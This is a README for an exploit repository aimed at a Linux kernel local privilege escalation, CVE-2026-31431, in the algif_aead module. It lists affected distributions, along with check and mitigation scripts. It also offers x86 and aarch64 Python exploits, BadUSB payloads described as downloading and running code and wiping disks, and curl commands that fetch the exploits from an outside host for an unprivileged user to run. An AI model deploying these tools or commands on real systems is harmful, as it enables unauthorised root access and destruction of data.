Copy Fail - CVE-2026-31431
Tested Distro / Version
A list of the most recent versions effected.
x86
| Distro | Version |
|---|---|
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 |
| Alphine Linux | 6.18.25-0-virt #1-Alpine |
| Ubuntu 24.04 LTS | 6.17.0-1007-aws |
| RHEL 10.1 | 6.12.0-124.45.1.el10_1 |
| SUSE 16 | 6.12.0-160000.9-default |
| NixOS 25.11 | 6.12.83 |
| Trisquel 12 | 6.18.21-generic-libre |
| GUIX | ???????????? |
| ChromeOS | ???????????? |
| OpenWRT | ?????????? |
This exploit effects DOCKER containers, but not VMs.
aarch64
| Distro | Version |
|---|---|
| Asahi Linux | 6.19.14-asahi |
| Ubuntu 24.04 ARM LTS | 6.17.0-1011-oracle |
| RaspbianOS ? | ???? |
unaffected
| Distro | Version | Reason |
|---|---|---|
| Devuan | 6.12.74+deb13+1-amd64 | algif_aead is not used by kernel |
| Debian 12 | 6.1.0-40-amd64 | Predates the exploit occurance (6.1.0-41 works) |
| Android 16 | 6.1.166-android14-11 | Permission to create socket in busybox not allowed |
Files
check.sh - makes a check to see if the exploitable crypto module is loaded.
mitigate.sh - unloads the exploitable crypto module, chances are you didnt need it anyway.
copy_fail.py - the complete exploit writeup in plain python code.
copy_fail_exp.py - the exploit in pure python for x86 systems.
copy_fail_exp_aarch64.py - the exploit in pure python for aarch64 systems.
badusb/ - badusb implementations of CVE to run local privilage escalation.
badusb/payload-curl.txt - download and run payload.
badusb/payload-typed.txt - use badusb to type payload then run.
badusb/CVE-2026-31431.txt - payload via curl and payload runs wiping disk.
badusb/CVE-2026-31431-typed.txt - payload typed out and payload runs wiping disk.
run to get the file as a non-privilaged user.
curl https://git.jonstarkey.co.uk/jon/CVE-2026-31431-tools/raw/branch/main/copy_fail_exp.py
or
curl https://git.jonstarkey.co.uk/jon/CVE-2026-31431-tools/raw/branch/main/copy_fail_exp_aarch64.py